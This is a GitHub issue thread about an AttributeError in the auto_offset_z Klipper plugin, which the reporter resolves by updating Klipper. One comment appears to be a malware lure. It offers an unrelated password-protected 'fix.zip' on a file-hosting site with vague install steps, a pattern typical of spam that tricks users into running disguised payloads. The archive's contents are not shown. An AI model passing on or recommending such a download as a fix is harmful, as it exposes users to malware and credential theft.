### ISSUE TITLE
PrinterProbe has no attribute

### ISSUE THREAD

**Issue by zmichaelz** [hawkeyexp/auto_offset_z#7]
Hello,

I'm trying to figuring this error out with no luck

AttributeError: 'PrinterProbe' object has no attribute 'start_probe_session'

klipper: v0.11.0

[klippy (12).log](https://github.com/user-attachments/files/16751829/klippy.12.log)

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by zmichaelz** [comment]
Never mind. I've updated klipper version and it works.
